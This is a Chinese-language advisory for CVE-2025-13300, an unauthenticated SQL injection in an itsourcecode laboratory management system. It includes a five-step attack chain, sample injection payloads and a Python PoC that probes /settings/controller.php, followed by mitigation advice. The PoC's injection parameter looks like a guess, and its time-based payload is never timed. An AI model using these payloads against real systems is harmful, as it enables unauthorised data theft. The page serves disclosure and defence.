CVE-2025-13300 itsourcecode实验室管理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13300

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Web-Based Internet Laboratory Management System 1.0

漏洞概述

CVE-2025-13300是itsourcecode公司开发的Web-Based Internet Laboratory Management System 1.0版本中存在的一个高危SQL注入漏洞。该漏洞位于/settings/controller.php文件中，由于对用户输入参数缺乏有效的过滤和参数化查询处理，攻击者可以通过构造恶意的SQL语句实现数据库注入攻击。成功利用此漏洞可导致敏感数据泄露，包括用户凭据、个人信息、实验数据等。攻击者还可能通过UNION SELECT等技术在某些情况下获取服务器权限。由于该漏洞可远程利用且无需认证，对暴露在互联网的该系统构成严重威胁。建议受影响的用户尽快采取修复措施或应用临时缓解方案。

技术细节

该SQL注入漏洞存在于itsourcecode实验室管理系统的/settings/controller.php文件中的某个未知功能模块。漏洞产生的根本原因是在处理用户请求参数时，未对输入进行充分的过滤和验证就直接拼接到SQL查询语句中。攻击者可以通过HTTP请求在相关参数中注入SQL语句，如使用单引号(')、UNION SELECT、布尔盲注、时间盲注等技术手段。典型的攻击Payload可能包括：' OR '1'='1、UNION SELECT NULL,version(),NULL--等。由于该文件处理的是系统设置相关的请求，攻击者可能获取管理员账户信息、修改系统配置或执行其他数据库操作。漏洞的CVSS评分为7.3（高危），攻击复杂度低，无需认证即可远程利用。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标服务器上运行的itsourcecode实验室管理系统版本，确认是1.0版本且存在/settings/controller.php端点

STEP 2

步骤2: 漏洞探测

通过发送带有SQL特殊字符（如单引号、UNION等）的HTTP请求，探测/settings/controller.php是否存在SQL注入漏洞

STEP 3

步骤3: 构造恶意Payload

根据目标数据库类型，构造针对性的SQL注入Payload，如使用UNION SELECT获取数据库版本、用户名等信息

STEP 4

步骤4: 数据提取

利用UNION注入或盲注技术，逐步提取数据库中的敏感数据，包括用户表、管理员账户、密码哈希等

STEP 5

步骤5: 权限提升或持久化

根据获取的凭据尝试登录管理后台，或利用数据库写入功能实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-13300 PoC - itsourcecode Laboratory Management System SQL Injection
# Affected: /settings/controller.php

import requests
import sys

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com/lab'

# SQL Injection payloads
payloads = [
    "' OR '1'='1",
    "' UNION SELECT NULL,NULL,NULL--",
    "' AND SLEEP(5)--",
    "' UNION SELECT 1,version(),3,4--"
]

def test_sql_injection(url, payload):
    """Test for SQL injection vulnerability"""
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    # Common injection point in settings controller
    data = {
        'id': payload,
        'action': 'update'
    }
    
    try:
        response = requests.post(f'{url}/settings/controller.php', 
                               data=data, 
                               headers=headers, 
                               timeout=10)
        
        # Check for SQL error indicators
        sql_errors = ['mysql', 'sql syntax', 'warning', 'error in your sql']
        response_lower = response.text.lower()
        
        for error in sql_errors:
            if error in response_lower:
                return True, payload
        
        return False, None
    except Exception as e:
        print(f'Error: {e}')
        return False, None

if __name__ == '__main__':
    print(f'[*] Testing CVE-2025-13300 on {target}')
    for payload in payloads:
        vulnerable, used_payload = test_sql_injection(target, payload)
        if vulnerable:
            print(f'[+] Vulnerable! Payload: {used_payload}')
            break
    else:
        print('[-] Not vulnerable or target not reachable')

影响范围

itsourcecode Web-Based Internet Laboratory Management System 1.0

防御指南

临时缓解措施

在官方修复方案发布前，可采取以下临时缓解措施：1）使用Web应用防火墙规则阻断可疑的SQL注入请求；2）对/settings/controller.php设置IP访问限制；3）临时禁用相关功能模块；4）加强数据库监控和日志审计，及时发现异常查询行为；5）考虑部署入侵检测系统（IDS）监控针对该漏洞的扫描和攻击行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13300
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13300
3 Details https://www.cvedetails.com/cve/CVE-2025-13300/
4 VulDB https://vuldb.com/cve/CVE-2025-13300
5 Link https://github.com/f14g-orz/CVE/issues/6
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.332640
8 Link https://vuldb.com/?id.332640
9 Link https://vuldb.com/?submit.691790